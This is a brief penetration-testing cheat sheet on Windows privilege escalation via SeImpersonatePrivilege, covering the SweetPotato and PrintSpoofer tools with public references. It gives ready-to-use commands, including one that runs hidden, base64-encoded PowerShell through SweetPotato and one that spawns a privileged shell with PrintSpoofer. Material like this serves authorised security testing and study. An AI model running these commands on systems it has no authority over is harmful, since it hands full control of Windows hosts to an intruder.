# SeImpersonatePrivilege

### Potatoes

Potatoes are a common way to escalate privileges on a Windows system after either the`SeImpersonate` or `SeAssignPrimaryToken` privileges have been enumerated. This can be accomplished quickly by running the following command:

```bash
whoami /priv
```

#### Sweet Potato

As noted by [Jorge Lajara](https://jlajara.gitlab.io/Potatoes_Windows_Privesc#sweetPotato), [Sweet Potato](https://github.com/CCob/SweetPotato) is one of the most successful potatoes to escalate privileges with. It contains the following exploits built-in to it, rendering the other potatoes obsolete:

> * RottenPotato
> * Weaponized JuicyPotato with BITS WinRM discovery
> * PrintSpoofer 
> * EfsRpc built on EfsPotato
> * PetitPotam

```bash
# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"
```

### PrintSpoofer

```bash
# Verify that the Print Spooler service is running
Get-Service Spooler

# Run the PrintSpoofer executable to escalate privileges
.\PrintSpoofer.exe -i -c powershell
```

### References

{% embed url="<https://jlajara.gitlab.io/Potatoes_Windows_Privesc>" %}
Guidance on using Potatoes
{% endembed %}

{% embed url="<https://github.com/itm4n/PrintSpoofer>" %}

{% embed url="<https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/>" %}